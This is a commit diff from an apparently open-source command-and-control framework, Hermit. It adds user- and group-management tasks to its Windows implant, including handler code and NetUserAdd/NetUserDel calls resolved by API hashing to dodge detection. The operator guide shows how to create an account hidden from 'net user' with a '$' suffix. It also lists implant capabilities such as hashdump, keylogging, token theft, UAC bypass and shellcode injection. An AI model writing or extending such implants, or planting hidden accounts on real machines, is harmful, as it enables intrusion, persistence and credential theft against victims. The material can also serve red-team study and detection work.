implemented 'user add' and 'group add' task

hideckies · Jul 29, 2024 · 5a1f90c · 5a1f90c
1 parent 8a9876f
commit 5a1f90c
Show file tree

Hide file tree

Showing 15 changed files with 636 additions and 159 deletions.
diff --git a/docs/guides/task.md b/docs/guides/task.md
@@ -39,20 +39,22 @@ TASK:
   ps ls           List processes.
   pwd             Print the current working directory.
   reg query       Enumerate subkeys for the specified path.
-  rm              Remove a file.
-  rmdir           Remove a directory.
+  rm              Remove file or directory.
   rportfwd add    Add settings to reverse port forwarding.
   rportfwd ls     List settings for reverse port forwarding.
   rportfwd rm     Stop and remove listener for reverse port forwarding.
   runas           Execute a program as another user.
   screenshot      Take a screenshot on target computer.
   shellcode       Inject shellcode into the specified process.
   sleep           Set sleep time (seconds) between requests from beacon.
+  sysinfo         Regrieve system information of target computer.
   token revert    Revert back to the original process token.
   token steal     Steal token from the specified process and impersonate process.
   uac             Bypass UAC and start another session.
   upload          Upload a file to the target computer.
+  user add        Add new user.
   user ls         List users.
+  user rm         Delete user account.
   users           Alias for 'user ls'.
   whoami          Print the current user information.
 ```
@@ -354,18 +356,16 @@ Hermit [agent-abcd] > reg query "HKLM\\SOFTWARE\\Microsoft" -r
 
 ## `rm`
 
-Removes a file.
+Removes file or directory.
 
 ```sh
 Hermit [agent-abcd] > rm example.txt
 ```
 
-## `rmdir`
-
-Removes a directory.
+To remove a directory recursively, add `-r` flag.
 
 ```sh
-Hermit [agent-abcd] > rmdir example_dir
+Hermit [agent-abcd] > rm -r example_dir
 ```
 
 ## `rportfwd`
@@ -410,6 +410,14 @@ Changes the Sleep time (N seconds).
 Hermit [agent-abcd] > sleep 10
 ```
 
+## `sysinfo`
+
+Retrieves the system information on a target machine.
+
+```sh
+Hermit [agent-abcd] > sysinfo
+```
+
 ## `token`
 
 Manages token.
@@ -443,10 +451,32 @@ Hermit [agent-abcd] > upload /tmp/example.txt C:/Users/John/Desktop/example.txt
 
 Manages users.
 
+### `user add`
+
+Add new user account.
+
+```sh
+Hermit [agent-abcd] > user add -u "John" -p "Password@123"
+```
+
+To hide a new user from `net user` command, add prefix `$` to the username as below:
+
+```sh
+Hermit [agent-abcd] > user add -u "John$" -p "Password@123"
+```
+
 ### `user ls`, `users`
 
 Lists local users.
 
+### `user rm`
+
+Delete a specified user.
+
+```sh
+Hermit [agent-abcd] > user rm -u "John"
+```
+
 ## `whoami`
 
 Prints current user information on victim machine.  

diff --git a/mkdocs.yml b/mkdocs.yml
@@ -3,8 +3,8 @@ theme:
   name: material
   palette:
     scheme: slate
-    primary: yellow
-    accent: lime
+    primary: black
+    accent: yellow
   logo: assets/logo.png
   favicon: assets/favicon.ico
   features:

diff --git a/payload/win/implant/CMakeLists.txt b/payload/win/implant/CMakeLists.txt
@@ -112,7 +112,6 @@ set(SOURCE_CORE
         src/core/task/pwd.cpp
         src/core/task/reg.cpp
         src/core/task/rm.cpp
-        src/core/task/rmdir.cpp
         src/core/task/rportfwd.cpp
         src/core/task/runas.cpp
         src/core/task/screenshot.cpp

diff --git a/payload/win/implant/include/core/procs.hpp b/payload/win/implant/include/core/procs.hpp
@@ -149,6 +149,8 @@
 #define HASH_FUNC_MOVEFILEW                     0x1831dbd5
 #define HASH_FUNC_NETAPIBUFFERFREE              0xd2840f3e
 #define HASH_FUNC_NETLOCALGROUPENUM             0x8823503d
+#define HASH_FUNC_NETUSERADD                    0xb89f30e
+#define HASH_FUNC_NETUSERDEL                    0xa20de1f8
 #define HASH_FUNC_NETUSERENUM                   0x7a5df1b4
 #define HASH_FUNC_OPENPROCESS                   0xc9e08d0
 #define HASH_FUNC_OPENPROCESSTOKEN              0x7d474909
@@ -457,6 +459,10 @@ namespace Procs
     typedef Win32::NET_API_STATUS (WINAPI* LPPROC_NETAPIBUFFERFREE)(LPVOID Buffer);
     // NetLocalGroupEnum
     typedef Win32::NET_API_STATUS (WINAPI* LPPROC_NETLOCALGROUPENUM)(LPCWSTR servername, DWORD level, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, PDWORD_PTR resumehandle);
+    // NetUserAdd
+    typedef Win32::NET_API_STATUS (WINAPI* LPPROC_NETUSERADD)(LPCWSTR servername, DWORD level, LPBYTE buf, LPDWORD parm_err);
+    // NetUserDel
+    typedef Win32::NET_API_STATUS (WINAPI* LPPROC_NETUSERDEL)(LPCWSTR servername, LPCWSTR username);
     // NetUserEnum
     typedef Win32::NET_API_STATUS (WINAPI* LPPROC_NETUSERENUM)(LPCWSTR servername, DWORD level, DWORD filter, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, PDWORD resume_handle);
     // OpenProcess
@@ -683,6 +689,8 @@ namespace Procs
         LPPROC_MOVEFILEW                    lpMoveFileW                         = nullptr;
         LPPROC_NETAPIBUFFERFREE             lpNetApiBufferFree                  = nullptr;
         LPPROC_NETLOCALGROUPENUM            lpNetLocalGroupEnum                 = nullptr;
+        LPPROC_NETUSERADD                   lpNetUserAdd                        = nullptr;
+        LPPROC_NETUSERDEL                   lpNetUserDel                        = nullptr;
         LPPROC_NETUSERENUM                  lpNetUserEnum                       = nullptr;
         LPPROC_OPENPROCESS                  lpOpenProcess                       = nullptr;
         LPPROC_OPENPROCESSTOKEN             lpOpenProcessToken                  = nullptr;

diff --git a/payload/win/implant/include/core/task.hpp b/payload/win/implant/include/core/task.hpp
@@ -51,43 +51,49 @@
 #define TASK_DOWNLOAD           0x09
 #define TASK_ENV_LS             0x10
 #define TASK_FIND               0x11
-#define TASK_GROUP_LS           0x12
-#define TASK_HASHDUMP           0x13
-#define TASK_HISTORY            0x14
-#define TASK_IP                 0x15
-#define TASK_JITTER             0x16
-#define TASK_KEYLOG             0x17
-#define TASK_KILL               0x18
-#define TASK_KILLDATE           0x19
-#define TASK_LS                 0x20
-#define TASK_MIGRATE            0x21
-#define TASK_MKDIR              0x22
-#define TASK_MV                 0x23
-#define TASK_NET                0x24
-#define TASK_PE                 0x25
-#define TASK_PERSIST            0x26
-#define TASK_PROCDUMP           0x27
-#define TASK_PS_KILL            0x28
-#define TASK_PS_LS              0x29
-#define TASK_PWD                0x30
-#define TASK_REG_QUERY          0x31
-#define TASK_RM                 0x32
-#define TASK_RMDIR              0x33
-#define TASK_RPORTFWD_ADD       0x34
-#define TASK_RPORTFWD_LS        0x35
-#define TASK_RPORTFWD_RM        0x36
-#define TASK_RUNAS              0x37
-#define TASK_SCREENSHOT         0x38
-#define TASK_SHELLCODE          0x39
-#define TASK_SLEEP              0x40
-#define TASK_SYSINFO            0x41
-#define TASK_TOKEN_REVERT       0x42
-#define TASK_TOKEN_STEAL        0x43
-#define TASK_UAC                0x44
-#define TASK_UPLOAD             0x45
-#define TASK_USER_LS            0x46
-#define TASK_WHOAMI             0x47
-#define TASK_WHOAMI_PRIV        0x48
+#define TASK_GROUP_ADD          0x12
+#define TASK_GROUP_ADDUSER      0x13
+#define TASK_GROUP_LS           0x14
+#define TASK_GROUP_RM           0x15
+#define TASK_GROUP_RMUSER       0x16
+#define TASK_GROUP_USERS        0x17
+#define TASK_HASHDUMP           0x18
+#define TASK_HISTORY            0x19
+#define TASK_IP                 0x20
+#define TASK_JITTER             0x21
+#define TASK_KEYLOG             0x22
+#define TASK_KILL               0x23
+#define TASK_KILLDATE           0x24
+#define TASK_LS                 0x25
+#define TASK_MIGRATE            0x26
+#define TASK_MKDIR              0x27
+#define TASK_MV                 0x28
+#define TASK_NET                0x29
+#define TASK_PE                 0x30
+#define TASK_PERSIST            0x31
+#define TASK_PROCDUMP           0x32
+#define TASK_PS_KILL            0x33
+#define TASK_PS_LS              0x34
+#define TASK_PWD                0x35
+#define TASK_REG_QUERY          0x36
+#define TASK_RM                 0x37
+#define TASK_RPORTFWD_ADD       0x38
+#define TASK_RPORTFWD_LS        0x39
+#define TASK_RPORTFWD_RM        0x40
+#define TASK_RUNAS              0x41
+#define TASK_SCREENSHOT         0x42
+#define TASK_SHELLCODE          0x43
+#define TASK_SLEEP              0x44
+#define TASK_SYSINFO            0x45
+#define TASK_TOKEN_REVERT       0x46
+#define TASK_TOKEN_STEAL        0x47
+#define TASK_UAC                0x48
+#define TASK_UPLOAD             0x49
+#define TASK_USER_ADD           0x50
+#define TASK_USER_LS            0x51
+#define TASK_USER_RM            0x52
+#define TASK_WHOAMI             0x53
+#define TASK_WHOAMI_PRIV        0x54
 
 namespace Task
 {
@@ -149,7 +155,12 @@ namespace Task
     std::wstring Download(State::PSTATE pState, const std::wstring& wSrc, const std::wstring& wDest);
     std::wstring EnvLs(State::PSTATE pState);
     std::wstring Find(State::PSTATE pState, const std::wstring& wPath, const std::wstring& wName);
+    std::wstring GroupAdd(State::PSTATE pState, const std::wstring& wName);
+    std::wstring GroupAddUser(State::PSTATE pState, const std::wstring& wGroupname, const std::wstring& wUsername);
     std::wstring GroupLs(State::PSTATE pState);
+    std::wstring GroupRm(State::PSTATE pState, const std::wstring& wName);
+    std::wstring GroupRmUser(State::PSTATE pState, const std::wstring& wGroupname, const std::wstring&wUsername);
+    std::wstring GroupUsers(State::PSTATE pState, const std::wstring& wGroupname);
     std::wstring Hashdump(State::PSTATE pState);
     std::wstring History(State::PSTATE pState);
     std::wstring Ip(State::PSTATE pState);
@@ -169,8 +180,7 @@ namespace Task
     std::wstring PsLs(State::PSTATE pState, const std::wstring& wFilter, const std::wstring& wExclude);
     std::wstring Pwd(State::PSTATE pState);
     std::wstring RegQuery(State::PSTATE pState, const std::wstring& wRootKey, const std::wstring& wSubKey, BOOL bRecursive);
-    std::wstring Rm(State::PSTATE pState, const std::wstring& wFile);
-    std::wstring Rmdir(State::PSTATE pState, const std::wstring& wDir);
+    std::wstring Rm(State::PSTATE pState, const std::wstring& wPath, BOOL bRecursive);
     std::wstring RportfwdAdd(State::PSTATE pState, const std::wstring& wLIP, const std::wstring& wLPort, const std::wstring& wFwdIP, const std::wstring& wFwdPort);
     std::wstring RportfwdLs(State::PSTATE pState);
     std::wstring RportfwdRm(State::PSTATE pState);
@@ -183,7 +193,9 @@ namespace Task
     std::wstring TokenSteal(State::PSTATE pState, const std::wstring& wPid, const std::wstring& wProcName, bool bLogin);
     std::wstring Uac(State::PSTATE pState, const std::wstring& wTechnique);
     std::wstring Upload(State::PSTATE pState, const std::wstring& wSrc, const std::wstring& wDest);
-    std::wstring Users(State::PSTATE pState);
+    std::wstring UserAdd(State::PSTATE pState, const std::wstring& wUsername, const std::wstring& wPassword);
+    std::wstring UserLs(State::PSTATE pState);
+    std::wstring UserRm(State::PSTATE pState, const std::wstring& wUsername);
     std::wstring Whoami(State::PSTATE pState);
     std::wstring WhoamiPriv(State::PSTATE pState);
 }

diff --git a/payload/win/implant/script/calc_hash_func.py b/payload/win/implant/script/calc_hash_func.py
@@ -131,6 +131,8 @@
     "MoveFileW",
     "NetApiBufferFree",
     "NetLocalGroupEnum",
+    "NetUserAdd",
+    "NetUserDel",
     "NetUserEnum",
     "OpenProcess",
     "OpenProcessToken",

diff --git a/payload/win/implant/src/core/handler.cpp b/payload/win/implant/src/core/handler.cpp
@@ -231,9 +231,41 @@ namespace Handler
                     Utils::Convert::UTF8Decode(args["name"])
                 );
                 break;
+            case TASK_GROUP_ADD:
+                wTaskResult = Task::GroupAdd(
+                    pState,
+                    Utils::Convert::UTF8Decode(args["name"])
+                );
+                break;
+            case TASK_GROUP_ADDUSER:
+                wTaskResult = Task::GroupAddUser(
+                    pState,
+                    Utils::Convert::UTF8Decode(args["name"]),
+                    Utils::Convert::UTF8Decode(args["username"])
+                );
+                break;
             case TASK_GROUP_LS:
                 wTaskResult = Task::GroupLs(pState);
                 break;
+            case TASK_GROUP_RM:
+                wTaskResult = Task::GroupRm(
+                    pState,
+                    Utils::Convert::UTF8Decode(args["name"])
+                );
+                break;
+            case TASK_GROUP_RMUSER:
+                wTaskResult = Task::GroupRmUser(
+                    pState,
+                    Utils::Convert::UTF8Decode(args["name"]),
+                    Utils::Convert::UTF8Decode(args["username"])
+                );
+                break;
+            case TASK_GROUP_USERS:
+                wTaskResult = Task::GroupUsers(
+                    pState,
+                    Utils::Convert::UTF8Decode(args["name"])
+                );
+                break;
             case TASK_HASHDUMP:
                 wTaskResult = Task::Hashdump(pState);
                 break;
@@ -310,10 +342,11 @@ namespace Handler
                 );
                 break;
             case TASK_RM:
-                wTaskResult = Task::Rm(pState, Utils::Convert::UTF8Decode(args["path"]));
-                break;
-            case TASK_RMDIR:
-                wTaskResult = Task::Rmdir(pState, Utils::Convert::UTF8Decode(args["path"]));
+                wTaskResult = Task::Rm(
+                    pState,
+                    Utils::Convert::UTF8Decode(args["path"]),
+                    Utils::Convert::UTF8Decode(args["recursive"]) == L"true"
+                );
                 break;
             case TASK_RPORTFWD_ADD:
                 wTaskResult = Task::RportfwdAdd(
@@ -384,8 +417,21 @@ namespace Handler
                     Utils::Convert::UTF8Decode(args["dest"])
                 );
                 break;
+            case TASK_USER_ADD:
+                wTaskResult = Task::UserAdd(
+                    pState,
+                    Utils::Convert::UTF8Decode(args["username"]),
+                    Utils::Convert::UTF8Decode(args["password"])
+                );
+                break;
             case TASK_USER_LS:
-                wTaskResult = Task::Users(pState);
+                wTaskResult = Task::UserLs(pState);
+                break;
+            case TASK_USER_RM:
+                wTaskResult = Task::UserRm(
+                    pState,
+                    Utils::Convert::UTF8Decode(args["username"])
+                );
                 break;
             case TASK_WHOAMI:
                 wTaskResult = Task::Whoami(pState);

diff --git a/payload/win/implant/src/core/procs.cpp b/payload/win/implant/src/core/procs.cpp
@@ -413,6 +413,10 @@ namespace Procs
         pProcs->lpNetApiBufferFree              = reinterpret_cast<LPPROC_NETAPIBUFFERFREE>(pNetApiBufferFree);
         PVOID pNetLocalGroupEnum                = GetProcAddressByHash(hNetapi32, HASH_FUNC_NETLOCALGROUPENUM);
         pProcs->lpNetLocalGroupEnum             = reinterpret_cast<LPPROC_NETLOCALGROUPENUM>(pNetLocalGroupEnum);
+        PVOID pNetUserAdd                       = GetProcAddressByHash(hNetapi32, HASH_FUNC_NETUSERADD);
+        pProcs->lpNetUserAdd                    = reinterpret_cast<LPPROC_NETUSERADD>(pNetUserAdd);
+        PVOID pNetUserDel                       = GetProcAddressByHash(hNetapi32, HASH_FUNC_NETUSERDEL);
+        pProcs->lpNetUserDel                    = reinterpret_cast<LPPROC_NETUSERDEL>(pNetUserDel);
         PVOID pNetUserEnum                      = GetProcAddressByHash(hNetapi32, HASH_FUNC_NETUSERENUM);
         pProcs->lpNetUserEnum                   = reinterpret_cast<LPPROC_NETUSERENUM>(pNetUserEnum);